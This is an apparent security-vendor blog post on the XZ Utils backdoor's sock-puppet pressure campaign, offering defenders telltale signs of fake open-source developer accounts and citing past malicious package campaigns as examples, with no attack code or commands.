The high-profile compromise of the XZ Utils open-source compression library, disclosed last week, highlights an under-reported threat: social engineering attacks that target open-source package maintainers and other developers to stage software supply chain attacks.
The coordinated social engineering campaign targeting XZ Utils' longtime maintainer, Lasse Collin, featured several presumably phony “sock puppet” developer accounts that carried out a pressure campaign aimed at getting Collin to allow code contributions from Jia Tan (JiaT75), a developer account that had become an active contributor to XZ Utils in the preceding months, — and eventually to hand control of the XZ Utils project to Tan.
As other researchers have noted, Tan’s involvement in the XZ Utils project built steadily over the span of more than a year, during which time Collin faced mounting pressure online from a curious assortment of new and noisy developer accounts. They frequently called out Collin in online posts for the slow pace of patches to xz-utils and the need for more integrations. In response, Collin cited “long term mental health” issues and other conflicts as the cause of his reduced attention to the XZ Utils project.
The developer accounts, with names such as Jigar Kumar and Dennis Ens, pressured Collin to get help maintaining the XZ Utils project. Waiting in the wings was Tan, and Collin eventually ceded control to him or her. That allowed Tan to insert malicious implants in the XZ Utils code. Meanwhile, more sock puppet accounts, with names such as Hans Jansen, misoeater91, and krygorin4545, cropped up to pressure the maintainers of prominent Linux distributions such as Debian to fold the latest versions of XZ Utils into their standard images.
The flurry of open source code contributions and related pressure campaigns from previously unknown developer accounts suggests that a coordinated social engineering campaign using phony developer accounts was used to sneak malicious code into a widely used open-source project. That leaves developers to wonder how they can distinguish a suspicious sock-puppet developer account from a legitimate contributor or downstream user of their code.
While there is no foolproof method to smoke out a phony developer account, there are telltale signs you can look for. Threat researchers share a few key indicators.
[ Special Report: The State of Software Supply Chain Security (SSCS) 2024 | Download Report: State of SSCS ]
1. Be on the lookout for new and noisy developer accounts
One characteristic of sock-puppet and malicious developer accounts is that they tend to be both new and highly active, posting a rapid succession of projects and updates within a short period of time. That’s not unique to malicious accounts, but it does stand out from the usual cadence that we see with legitimate developer accounts, which tend to build gradually with contributions spread out over time.
For example, ReversingLabs' recent research on the BIPClip campaign of malicious Python Package Index (PyPI) projects focused on two packages that were published by james_pycode, a throwaway PyPI maintainer account that was created on the same day the two packages were published. That’s something ReversingLabs often observes with malicious campaigns distributed through open-source package repositories.
And, unlike the attack on XZ, attackers typically make only a minimal effort to bolster the reputation or credibility of these malicious accounts — uploading no avatar and providing limited information about the developer beyond their account name. However, that’s not always the case. Sophisticated supply chain attackers that leverage open-source repositories often invest time and resources to mimic official pages and legitimate developer accounts. The IconBurst campaign that ReversingLabs uncovered in July 2022 is an example of this type of operation.
2. Really good operational security is a cause for concern
Another red flag that a developer account may be a malicious sock puppet is its OpSec, or operational security. That’s a military term that describes the process of concealing information that reveals one's identity or intentions.
Historically, the open-source community has been a transparent environment, with developers contributing their personal time and resources to support many different projects while weighing in on discussion boards and in other venues. Developer accounts are frequently linked to email addresses that also crop up elsewhere on the web, including on social networks such as LinkedIn. Also, patterns of activity such as code commits can reveal IP addresses and even details about the time zone a developer is likely working from (assuming they work during daylight hours), narrowing the geography in which they are located.
So, with a minimum of effort, it is usually possible to tie a developer’s activity on an open-source platform to something real, said Robert Perica, a principal engineer at ReversingLabs: a personal or employer email address, a personal web page, social media accounts, and so on.
But it probably won't be possible in the case of sock-puppet accounts such as those behind the XZ Trojan incident. As noted by security journalist Brian Krebs, neither the email used by the malicious developer, Jia Tan, nor those used by the supporting harasser accounts show up anywhere else on the Internet — including in massive data dumps. That’s highly suspicious.
“To see this complete lack of presence in breached databases once or twice in the course of an investigation is rare, but to find it multiple times suggests we're dealing with an operation that was set up carefully from the beginning. And that almost certainly means a group project (state-sponsored)."
—Brian Krebs
Researcher Evan Boehs noted in his analysis that the “Jia Tan” developer was present on other platforms, such as the #tukaani IRC channel on Libera.Chat. The IP addresses associated with that activity were likely a proxy server, he said.
Boehs said that the developer’s name suggests that Jia Tan is of Chinese descent — possibly based in Hong Kong. However, “independent analysis of commit timings concludes that the perpetrator worked 'Office Hours' in a UTC+02/03 timezone,” “worked through the Lunar New Year, and did not work on some notable Eastern European holidays, including Christmas and New Year.” That casts links between the campaign and China/Hong Kong into doubt.
Who is Jia Tan and his or her accomplices? Because of really good OpSec, we may never know. That's a red flag for development organizations considering packages authored by such accounts.
3. Decode phonies by looking for clues in the developer's code
It is possible to smoke out malicious sock-puppet developer accounts by taking a look under the hood at the code they are claiming responsibility for. As ReversingLabs research has shown, clues in the packages pushed by developer accounts can often signal that something is amiss.
The most obvious clues that stand out include the use of “typosquatting”: naming projects and code to closely resemble well-established and widely used open-source packages. For example, a malicious software supply chain campaign that ReversingLabs researchers uncovered in October 2023 hinged on a package, node-hide-console-windows, which downloaded a Discord bot that facilitated the planting of an open-source rootkit, r77.
The package was mimicking the legitimate npm package node-hide-console-window, which is used to toggle an application’s console window visibility. If a new maintainer account is pushing rapid updates to a brand-new open-source package that has a name closely resembling another widely used open-source package, it's a good sign they are bogus.
Aside from typosquatting, code obfuscation or network activities in postinstall scripts that are executed immediately after package installation often indicate something is amiss. (ReversingLabs researchers documented the use of both of these approaches in the March 2022 Material Tailwind campaign.)
At other times, malicious packages are copied across multiple open-source projects with different names using either the same maintainer account or a constellation of different accounts. The ReversingLabs research team found such behavior in the recent GitGot campaign. Two malicious packages, warbeast2000 and kodiak2k, were observed being published to the npm open-source package manager by a variety of maintainer accounts.
Finally, malicious packages from different maintainers may beacon to shared, malicious command-and-control (C2) infrastructure. The Material Tailwind campaign malware, for example, used Google Drive, Microsoft OneDrive, and GitHub to fetch the address of the real C2 server. In the IAmReboot campaign, the ReversingLabs threat research team documented the use of distributed malicious NuGet downloaders to host second-stage malware, obfuscating a version of the SeroXen RAT on a GitHub repository.
Collecting valuable threat intelligence such as the IP addresses of suspicious or malicious infrastructure can help close the door on malicious packages before they infiltrate your development pipeline.
Key lesson: Where's there's smoke, there may be fire
Of course, none of these telltale signs is conclusive of a malicious actor or campaign. Millions of open-source developers are working across the globe on a mind-bending number of projects, both commercial and personal. That creates room for all manner of strange or ill-conceived activity around developer accounts that may not be malicious.
However, where there’s smoke, there is often fire. The coincidence of one or more of these telltale signs of a malicious sock-puppet developer account should prompt a developer or development teams to pause and take a closer look at the code they're considering using. And the developers responsible for maintaining the code should second that effort.
Keep learning
- Find the best building blocks for your next app with RL's Spectra Assure Community, where you can quickly search the latest safe packages on npm, PyPI and RubyGems.
- Get up to speed on securing AI/ML systems and software with our Special Report. Plus, see the Webinar: The MLephant in the Room.
- Learn about complex binary analysis and why it is critical to software supply chain security in our Special Report. Plus: Take a deep dive with RL's white paper.
Explore RL's Spectra suite: Spectra Assure for software supply chain security, Spectra Detect for scalable file analysis, Spectra Analyze for malware analysis and threat hunting, and Spectra Intelligence for reputation data and intelligence.